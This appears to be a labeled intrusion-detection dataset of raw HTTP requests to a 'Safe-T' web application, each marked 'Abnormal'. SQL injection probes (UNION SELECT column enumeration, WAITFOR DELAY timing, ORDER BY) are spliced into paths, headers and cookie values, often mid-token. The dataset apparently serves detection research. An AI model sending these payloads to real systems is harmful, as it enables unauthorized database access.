%2C NULL %23 text/javascript */*; q=0.01Accept-Language: en-USen;q=0.5Accept-Encoding: gzip deflateDNT: 1Content-Type: application/json; charset=utf-8X-Requested-With: XMLHttpRequestReferer: https://192.168.4.109/Safe-T/default.aspxContent-Length: 25Cookie: clz02j6mgdqpzoey8i5010pz; SFTSId=dnsm0flp3iimy0oxjttymdys; .safeApiAuth=6AF734B51DC559EAB8F898DAB445D97910657850CFE6B9A2FEDC71F3468A4D3C51431F27F051215A2A743D6E854DC58AA0E0BE984E0A964A6802D81103FBAE4341BF760022F8309B8E7929C983B1B1D861D13572293091CB062ECAFB35F3CBF7ABBCC258C1031923DDA0ACD390CE0BB185E7F892; __tempRemoteIdentifier__=409a1cb3549f4f8b9f13430035208736Connection: keep-alivePragma: no-cacheCache-Control: no-cache,Abnormal
POST /Safe-T/de%20 UNION %20 ALL %20 SELECT %20 NULL %2C NULL %2C NULL %2C NULL %2C NULL %2C NULL %2C NULL %2C NULL %2C NULL %23fault.aspx/getFilesInFolder HTTP/1.1H%20 UNION %20 ALL %20 SELECT %20 NULL %2C NULL %2C NULL %2C NULL %2C NULL %2C NULL %2C NULL %2C NULL %2C NULL %23ost: 192.168.4.109User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:42.0) Gecko/20100101 Firefox/42.0Accept: application/json text/javascript */*; q=0.01Accept-Language: e%20 UNION %20 ALL %20 SELECT %20 NULL %2C NULL %2C NULL %2C NULL %2C NULL %2C NULL %2C NULL %2C NULL %2C NULL %23n-USen;q=0.5Accept-Encoding: gzip deflateDNT: 1Content-Type: application/json; charset=utf-8X-Requested-With: XMLHttpRequestReferer: https://192.168.4.109/Safe-T/default.aspxContent-Length: 26Cookie: clz02j6mgdqpzoey8i5010pz; SFTSId=dnsm0flp3iimy0oxjttymdys; .safeApiAuth=6AF734B51DC559EAB8F898DAB445D97910657850CFE6B9A2FEDC71F3468A4D3C51431F27F051215A2A743D6E854DC58AA0E0BE984E0A964A6802D81103FBAE4341BF760022F8309B8E7929C983B1B1D861D13572293091CB062ECAFB35F3CBF7ABBCC258C1031923DDA0ACD390CE0BB185E7F892; __tempRemoteIdentifier__=409a1cb3549f4f8b9f13430035208736Connection: keep-alivePragma: no-cacheCache-Control: no-cache,Abnormal
POST /Safe-T/default.aspx/getFilesInFolder HTTP/1.1Host: 192.168.4.109User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:42.0) Gecko/20100101 Firefox/42.0Accept: application/json text/javascript */*; q=0.01Accept-Language: en-USen;q=0.5Accept-Encoding: gzip deflateDNT: 1Content-Type: application/json; charset=%29 %20 UNION %20 ALL %20 SELECT %20 NULL %2C NULL %2C NULL %2C NULL %2C NULL %2C NULL %2C NULL %23utf-8X-Requested-With: XMLHttpRequestReferer: https://192.168.4.109/Safe-T/default.aspxContent-Length: 26Cookie: clz02j6mgdqpzoey8i5010pz; SFTSId=dnsm0flp3iimy0oxjttymdys; .safeApiAuth=6AF734B51DC559EAB8F898DAB445D97910657850CFE6B9A2FEDC71F3468A4D3C51431F27F051215A2A743D6E854DC58AA0E0BE984E0A964A6802D81103FBAE4341BF760022F8309B8E7929C983B1B1D861D13572293091CB062ECAFB35F3CBF7ABBCC258C1031923DDA0ACD390CE0BB185E7F892; __tempRemoteIdentifier__=409a1cb3549%29 %20 UNION %20 ALL %20 SELECT %20 NULL %2C NULL %2C NULL %2C NULL %2C NULL %2C NULL %2C NULL %23f4f8b9f13430035208736Connection: keep-alivePragma: no-cacheCache-Control: no-cache,Abnormal
POST /Safe-T/default.aspx/getFolderContent HTTP/1.1Host: 192.168.4.109User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:42.0) Gecko/20100101 Firefox/42.0Accept: application/json text/javascript */*; q=0.01Accept-Language: en-USen;q=0.5Accept-Encoding: gzip deflateDNT: 1Content-Type: application/json; chars%29 %20 UNION %20 ALL %20 SELECT %20 NULL %2C NULL %2C NULL %2C NULL %2C NULL %2C NULL %23et=utf-8X-Requested-With: XMLHttpRequestReferer: https://192.168.4.109/Safe-T/default.aspxContent-Length: 26Cookie: clz02j6mgdqpzoey8i5010pz; SFTSId=dnsm0flp3iimy0oxjttymdys; .safeApiAuth=6AF734B51DC559EAB8F898DAB445D97910657850CFE6B9A2FEDC71F3468A4D3C51431F27F051215A2A743D6E854DC58AA0E0BE984E0A964A6802D81103FBAE4341BF760022F8309B8E7929C983B1B1D861D13572293091CB062ECAFB35F3CBF7ABBCC258C1031923DDA0ACD390CE0BB185E7F892; __tempRemoteIdentifier__=409a1cb3549f4f8b9f13430035208736Connection: keep-alivePragma: no-cacheCache-Control: no-cache,Abnormal
POST /Safe-T/default.aspx/getFilesInFolder HTTP/1.1Host: 192.168.4.109User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:42.0) Gecko/20100101 Firefox/42.0Accept: application/json text/javascript */*; q=0.01Accept-Lang%20 UNION %20 ALL %20 SELECT %20 NULL %2C NULL %2C NULL %2C NULL %2C NULL %2C NULL %2C NULL %2C NULL %23uage: en-USen;q=0.5Accept-Encoding: gzip deflateDNT: 1Content-Type: application/json; charset=utf-8X-Requested-With: XMLHttpRequestReferer: https://192.168.4.109/Safe-T/default.aspxContent-Length: 26Cookie: clz02j6mgdqpzoey8i5010pz; SFTSId=dnsm0flp3iimy0oxjttymdys; .safeApiAuth=6AF734B51DC559EAB8F898DAB445D97910657850CFE6B9A2FEDC71F3468A4D3C51431F27F051215A2A743D6E854DC58AA0E0BE984E0A964A6802D81103FBAE4341BF760022F8309B8E7929C983B1B1D861D13572293091CB062ECAFB35F3CBF7ABBCC258C1031923DDA0ACD390CE0BB185E7F892; __tempRemoteIdentifier__=409a1cb3549f4f8b9f13430035208736Connection: keep-alivePragma: no-cacheCache-Control: no-cache,Abnormal
POST /Safe-T/default.aspx/getFolderContent HTTP/1.1Host: 192.168.4.109User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:42.0) Gecko/20100101 Firefox/42.0Accept: application/json text/javascript */*; q=0.01Accept-Language:%20 UNION %20 ALL %20 SELECT %20 NULL %2C NULL %2C NULL %2C NULL %2C NULL %2C NULL %2C NULL %23 en-USen;q=0.5Accept-Encoding: gzip deflateDNT: 1Content-Type: application/json; charset=utf-8X-Requested-With: XMLHttpReques%20 UNION %20 ALL %20 SELECT %20 NULL %2C NULL %2C NULL %2C NULL %2C NULL %2C NULL %2C NULL %23tReferer: https://192.168.4.109/Safe-T/default.aspxContent-Length: 25Cookie: clz02j6mgdqpzoey8i5010pz; SFTSId=dnsm0flp3iimy0oxjttymdys; .safeApiAuth=6AF734B51DC559EAB8F898DAB445D97910657850CFE6B9A2FEDC71F3468A4D3C51431F27F051215A2A743D6E854DC58AA0E0BE984E0A964A6802D81103FBAE4341BF760022F8309B8E7929C983B1B1D861D13572293091CB062ECAFB35F3CBF7ABBCC258C1031923DDA0ACD390CE0BB185E7F892; __tempRemoteIdentifier__=409a1cb3549f4f8b9f13430035208736Connection: keep-alivePragma: no-cacheCache-Control: no-cache,Abnormal
POST /Safe-T/default.aspx/getFilesInFolder HTTP/1.1Host: 192.168.4.109User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:42.0) Gecko/20100101 Firefox/42.0Accept: application/json text/javascript */*; q=0.01Accept-Language: en-USen;q=0.5Accept-Encoding: gzip deflateDNT: 1Content-Type: application/json; charset=utf-8X-Request%20 UNION %20 ALL %20 SELECT %20 NULL %2C NULL %2C NULL %2C NULL %2C NULL %2C NULL %23ed-With: XMLHttpRequestReferer: https://192.168.4.109/Safe-T/default.aspxContent-Length: 26Cookie: clz02j6mgdqpzoey8i5010pz; SFTSId=dnsm0flp3iimy0oxjttymdys; .safeApiAuth=6AF734B51DC559EAB8F898DAB445D97910657850CFE6B9A2FEDC71F3468A4D3C51431F27F051215A2A743D6E854DC58AA0E0BE984E0A964A6802D81103FBAE4341BF760022F8309B8E7929C983B1B1D861D13572293091CB062ECAFB35F3CBF7ABBCC258C1031923DDA0ACD390CE0BB185E7F892; __tempRemoteIdentifier__=409a1cb3549f4f8b9f13430035208736Connection: keep-alivePragma: no-cacheCache-Control: no-cache,Abnormal
POST /Safe-T/default.aspx/getFolderContent HTTP/1.1Host: 192.168.4.109User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:%29 %20 UNION %20 ALL %20 SELECT %20 NULL %2C NULL %2C NULL %2C NULL %2C NULL %23.0) Gecko/20100101 Firefox/42.0Accept: application/json text/javascript */*; q=0.01Accept-Language: en-USen;q=0.5Accept-Encoding: gzip deflateDNT: 1Content-Type: application/json; charset=utf%29 %20 UNION %20 ALL %20 SELECT %20 NULL %2C NULL %2C NULL %2C NULL %2C NULL %23-8X-Requested-With: XMLHttpRequestReferer: https://192.168.4.109/Safe-T/default.aspxContent-Length: 25Cookie: clz02j6mgdqpzoey8i5010pz; SFTSId=dnsm0flp3iimy0oxjttymdys; .safeApiAuth=6AF734B51DC559EAB8F898DAB445D97910657850CFE6B9A2FEDC71F3468A4D3C51431F27F051215A2A743D6E854DC58AA0E0BE984E0A964A6802D81103FBAE4341BF760022F8309B8E7929C983B1B1D861D13572293091CB062ECAFB35F3CBF7ABBCC258C1031923DDA0ACD390CE0BB185E7F892; __tempRemoteIdentifier__=409a1cb3549f4f8b9f13430035208736Connection: keep-alivePragma: no-cacheCache-Control: no-cache,Abnormal
POST /Safe-T/default.aspx/getFilesInFolder HTTP/1.1Host: 192.168.4.109User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:42.0) Gecko/20100101 Firefox/42.0Accept: application/json text/javascript */*; q=0.01Accept-Language: en-USen;q=0.5Accept-Encoding: gzip deflateDNT: 1Content-Type: application/json; charset=utf-8X-Requested-With: XMLHttpRequestReferer: https://192.168.4.109/Safe-T/default.aspxContent-Length: 27Cookie: clz02j6mgdqpzoey8i5010pz; SFTSId=dnsm0flp3iimy0oxjttymdys; .safeApiAuth=%20 WAITFOR %20 DELAY %20 %27 0%3A0%3A5 %27 --; __tempRemoteIdentifier__=%20 WAITFOR %20 DELAY %20 %27 0%3A0%3A5 %27 --: keep-alivePragma: no-cacheCache-Control: no-cache,Abnormal
POST /Safe-T/default.aspx/getFilesInFolder HTTP/1.1Host: 192.168.4.109User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:42.0) Gecko/20100101 Firefox/42.0Accept: application/json text/javascript */*; q=0.01Accept-Language: en-USen;q=0.5Accept-Encoding: gzip deflateDNT: 1Content-Type: application/json; charset=utf-8X-Requested-With: XMLHttpRequestReferer: https://192.168.4.109/Safe-T/default.aspxContent-Length: 26Cookie: clz02j6mgdqpzoey8i5010pz; SFTSId=dnsm0flp3iimy0oxjttymdys; .safeApiAuth=%20 WAITFOR %20 DELAY %20 %27 0%3A0%3A5 %27 --; __tempRemoteIdentifier__=409a1cb3549f4f8b9f13430035208736Connection: keep-alivePragma: no-cacheCache-Control: no-cache,Abnormal
POST /Safe-T/default.aspx/getFilesInFolder HTTP/1.1Host: 192.168.4.109User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:42.0) Gecko/20100101 Firefox/42.0Accept: application/json text/javascript */*; q=0.01Accept-Language: en-USen;q=0.5Accept-Encoding: gzip deflateDNT: 1Content-Type: application/json; charset=utf-8X-Requested-With: XMLHttpRequestReferer: https://192.168.4.109/Safe-T/default.aspxContent-Length: 26Cookie: clz02j6mgdqpzoey8i5010pz; SFTSId=dnsm0flp3iimy0oxjttymdys; .safeApiAuth=%27 %20 ORDER %20 BY %20 1 %23; __tempRemoteIdentifier__=409a1cb3549f4f8b9f13430035208736Connection: keep-alivePragma: no-cacheCache-Control: no-cache,Abnormal
POST /Safe-T/default.aspx/getFolderContent HTTP/1.1Host: 192.168.4.109User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:42.0) Gecko/20100101 Firefox/42.0Accept: application/json text/javascript */*; q=0.01Accept-Language: en-USen;q=0.5Accept-Encoding: gzip deflateDNT: 1Content-Type: application/json; charset=utf-8X-Requested-With: XMLHttpRequestReferer: https://192.168.4.109/Safe-T/default.aspxContent-Length: 26Cookie: clz02j6mgdqpzoey8i5010pz; SFTSId=dnsm0flp3iimy0oxjttymdys; .safeApiAuth=%27 %20 ORDER %20 BY %20 1 %23; __tempRemoteIdentifier__=%27 %20 ORDER %20 BY %20 1 %23: keep-alivePragma: no-cacheCache-Control: no-cache,Abnormal